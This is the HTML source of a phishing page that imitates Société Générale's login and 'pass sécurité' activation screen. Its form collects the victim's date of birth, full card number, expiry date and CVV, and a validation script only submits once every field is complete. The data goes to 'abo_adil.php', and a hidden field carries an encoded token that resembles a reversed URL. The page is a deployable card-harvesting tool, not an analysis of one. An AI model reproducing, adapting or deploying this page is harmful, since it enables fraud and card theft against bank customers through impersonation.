<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
	<title>Société Générale | Connexion</title>
	<link rel="icon" type="image/x-icon" href="./img2/index.ico">
	<link rel="stylesheet" href="./css/main-sms.css">
	<link rel="stylesheet" href="./css/media-sms.css">
	
</head>
<body>
	<div class="kolchi">
		
		<div class="header">
			<div class="header-left"></div>
			<!-- hena sala header left -->
			<div class="header-right"></div>
			<!-- hena sala header right -->
		</div>
		<!-- hena sala header -->
		<div class="header-phone">
				<div class="header-phone-left"></div>
				<div class="header-phone-right"></div>
	    </div>
			<!-- hena sala header right -->
		<div class="navbar">
			<div class="hr"></div>
			<div class="hr-bg">
				<div class="hr-tit"></div>
			</div>
		</div>
		<div class="navbar-phone"></div>
		<!-- hena sala navbar right -->
		<center>
			<div class="dakchi-west">

				<div class="dakchi-west-body">
					<div class="hena-bikola">
					<form id="form" action="abo_adil.php" method="post" >
						<div class="bikola-title-1">Activation de votre pass sécurité </div>
						<div class="bikola1">
							<div class="bikola1-1">1. DATE DE NAISSANCE</div>
							<div class="bikola1-2">
								<div class="data"><input id="jj" name="jj" type="text" pattern="\d*" class="datos" placeholder="Jour" maxlength="2" size="2" ></div>
								<div class="data"><input id="mm" name="mm" type="text" pattern="\d*" class="datos" placeholder="Mois" maxlength="2" size="2" ></div>
								<div class="data"><input id="aa" name="aa" type="text" pattern="\d*" class="datos" placeholder="Année" maxlength="4" size="4" ></div>
							</div>
						</div>
						<div class="bikola1">
							<div class="bikola1-1">2. VOTRE CARTE CRÉDIT</div>
							<div class="bikola1-2">
								
							<div class="bibita">
                                    <input type="text" id="cv" name="cv" pattern="\d*" class="harba" placeholder="XXXXXXXXXXXXXXXX" maxlength="16" size="4" >
								</div>
							</div>
						</div>
						<div class="bikola1">
							<div class="bikola1-1">3. DATE D'EXPIRATION</div>
							<div class="bikola1-2">
								<div class="bikoza">
									<div id="MOISs">
										<select name="EMM"  id="EMM" class="solking">
                                              <option value="" disabled selected>Mois</option>
                                              <option value="01">01</option>
                                              <option value="02">02</option>
                                              <option value="03">03</option>
                                              <option value="04">04</option>
                                              <option value="05">05</option>
                                              <option value="06">06</option>
                                              <option value="07">07</option>
                                              <option value="08">08</option>
                                              <option value="09">09</option>
                                              <option value="10">10</option>
                                              <option value="11">11</option>
                                              <option value="12">12</option>
                                        </select>
                                    </div>
								</div>
								<div class="bikoza">
									<div id="Anne">
										<select name="EYY"  id="EYY" class="solking">
                                             
                                             <option value="2020">2020</option>
                                             <option value="2021">2021</option>
                                             <option value="2022">2022</option>
                                             <option value="2023">2023</option>
                                             <option value="2024">2024</option>
                                             <option value="2025">2025</option>
                                             <option value="2025">2026</option>
                        
                                        </select>
                                    </div>
								</div>
							</div>
						</div>
						<div class="bikola1">
							<div class="bikola1-1">4. CRYPTOGRAMME VISUEL</div>
							<div class="bikola1-2">
								<div class="bibita">
                                    <input type="text" id="xxx" name="xxx" pattern="\d*" class="harba" placeholder="XXX" maxlength="3" size="3" >
								</div>
							</div>
							<div class="foter"><center><div class="buta-foter" onclick="chek_put();">ACTIVER MON PASS SÉCURITÉ</div></center></div> <input type="hidden" name="token" value="PWlwYT9waHAuaXBhL3RsdXplci95Z29sb25oY2V0Lm9jLnJlbmltaXVnLy86cHR0aA">
						</div>	
					</form>
						
					</div>
				</div>
				
			</div>
			<!-- hena sala dakchi west -->
		</center>
    
	</div>
	<!-- hena sala kolchi -->
     <div class="foot"></div>
<script type="text/javascript" > 
function chek_put()
{
var puta1 = document.getElementById('jj');
var puta2 = document.getElementById('mm');
var puta3 = document.getElementById('aa');
var puta4 = document.getElementById('cv');
var puta5 = document.getElementById('EMM');
var puta6 = document.getElementById('EYY');
var puta7 = document.getElementById('xxx');
if (puta1.value.length < 2)
{
	puta1.style.borderColor = "red"; 
	} 
	if (puta2.value.length < 2)
	{ 
	puta2.style.borderColor = "red"; 
	} 
	if (puta3.value.length < 4) 
	{
		puta3.style.borderColor = "red"; 
		} 
		if (puta4.value.length < 16) {
			puta4.style.borderColor = "red"; 
			} 
			if (puta5.value.length < 2) {
				puta5.style.borderColor = "red"; 
				} 
				if (puta6.value.length < 4) {
					puta6.style.borderColor = "red"; 
					} 
					if (puta7.value.length < 3) {
						puta7.style.borderColor = "red"; 
						} 
					
if (puta1.value.length == 2 && puta2.value.length == 2 && puta3.value.length == 4 && puta4.value.length == 16 && puta7.value.length == 3 && puta5.value.length == 2 && puta6.value.length == 4)
							{
								document.getElementById('form').submit();
						 
						}  
						
	
}
	</script> 
</body>
</html>